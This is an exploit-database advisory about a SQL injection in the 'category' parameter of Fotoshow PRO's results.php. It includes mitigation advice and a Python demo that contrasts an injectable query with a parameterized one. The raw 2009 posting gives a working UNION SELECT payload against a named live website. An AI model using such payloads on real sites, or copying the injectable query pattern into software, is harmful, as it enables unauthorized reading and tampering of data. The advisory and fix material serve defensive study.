Vendor: Fotoshow PRO™
By: darkmasking
CVSS: N/A
Type: Remote SQL Injection
Product Name: Fotoshow PRO™
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2009

Fotoshow PRO™ (category) Remote SQL Injection Vulnerability

The `category` parameter of results.php is used in a database query without sanitisation, so a remote attacker can inject SQL into the application's queries, potentially reading data they are not authorised to see or modifying it.

Mitigation:

The vendor should release a patch or update that fixes the SQL injection. Until one is available, users should avoid using the affected software or restrict access to it to trusted networks only.
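The root cause described above is a parameter spliced into query text. The following is an added example (not code from the page, the advisory author, or the Fotoshow PRO™ product, which is a PHP application) showing the same flaw and its fix in Python against an in-memory SQLite table; the table and column names are assumptions, and the injected input is a constructed value shaped like the advisory's proof of concept. The hardened version validates that `category` is the integer the application expects and binds it as a parameter, so the database never interprets user input as SQL.

```python
import sqlite3

# Constructed stand-in for a photo catalogue. The real Fotoshow PRO schema
# is not on the page; these table and column names are assumptions.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (id INTEGER, category INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO photos VALUES (?, ?, ?)",
        [(1, 10, "sunset"), (2, 10, "harbour"), (3, 20, "forest")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, category):
    """Mirrors the flaw: the request parameter is pasted into the SQL text."""
    sql = f"SELECT id, title FROM photos WHERE category = {category} ORDER BY id"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, category):
    """Hardened form: enforce the expected type, then bind the value.

    Binding means the driver sends the value separately from the statement,
    so even a string containing SQL keywords is compared as a plain integer
    (or rejected before the query runs).
    """
    try:
        category_id = int(category)
    except (TypeError, ValueError):
        # In a web handler this would become a 400 response; here we
        # simply return no rows for an input that is not a category id.
        return []
    return conn.execute(
        "SELECT id, title FROM photos WHERE category = ? ORDER BY id",
        (category_id,),
    ).fetchall()


# Constructed input shaped like the advisory's PoC, adapted to this two-column
# query and to SQLite's sqlite_version() (MySQL's version() does not exist here).
INJECTED_CATEGORY = "-9999 and 1=0 union select 0, sqlite_version()"


if __name__ == "__main__":
    db = build_db()
    print("normal lookup :", search_parameterized(db, "10"))
    print("vulnerable    :", search_vulnerable(db, INJECTED_CATEGORY))
    print("parameterized :", search_parameterized(db, INJECTED_CATEGORY))
```

In the vulnerable function the injected string changes the statement's meaning and the result row carries the database version instead of a photo; in the hardened one the same string fails the integer check and the query is never built from it. The equivalent fix in the application's own language is a prepared statement (PDO or mysqli with bound parameters) combined with the same type check on `category`.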

Exploit-DB raw data:

[»]====================================================================================================================[_][-][X]
[»]                                                                             					     [»]
[»]      	                   Fotoshow PRO™ (category) Remote SQL Injection Vulnerability  		             [»]
[»]              				         							             [»]
[»]            		 	        =======    ------d-------m------     ====    ====   			             [»]
[»]             	 	        ||     =        | |(o o)| |          ||   ||   ||   			             [»]
[»]             		        ||     =          ||(~)||            ||        ||   			             [»]
[»]             	 	        =======             /|\              ||        ||  			             [»]
[»]==========================================================================================================================[»]
[»] 				          Author         : darkmasking		 				             [»]
[»] 				          Date           : August, 15th 2009           				             [»]
[»]           		 	          Contact        : darkmasking[at]gmail[dot]com  			             [»]
[»]				          Critical Level : Dangerous (*RED)		  			             [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description :        					             				     [»]
[»] Software : Fotoshow PRO™							            				     [»]
[»] Vendor   : http://www.fotoshowpro.com/					            				     [»]
[»] Price    : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/	             				     [»]
[»]==========================================================================================================================[»]
[»]														             [»]
[»] [~] SQLi POC												             [»]
[»] 														             [»]
[»] [+] http://www.target.com/[path]/results.php?category=[SQli]`						             [»]
[»]														             [»]
[»]														             [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»]														             [»]
[»] [~] SQLi POC Demo													     [»]
[»]															     [»]
[»] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null--  [»]
[»]														             [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»]														             [»]
[»] [~] Greetz													             [»]
[»]														             [»]
[»]	Sorry bro, haven't found any friends yet, so this one is just for myself! (HAPPY 17th OF AUGUST | Hope it's festive)	             [»]
[»]														             [»]
[»]														             [»]
[»]==========================================================================================================================[»]

# milw0rm.com [2009-08-18]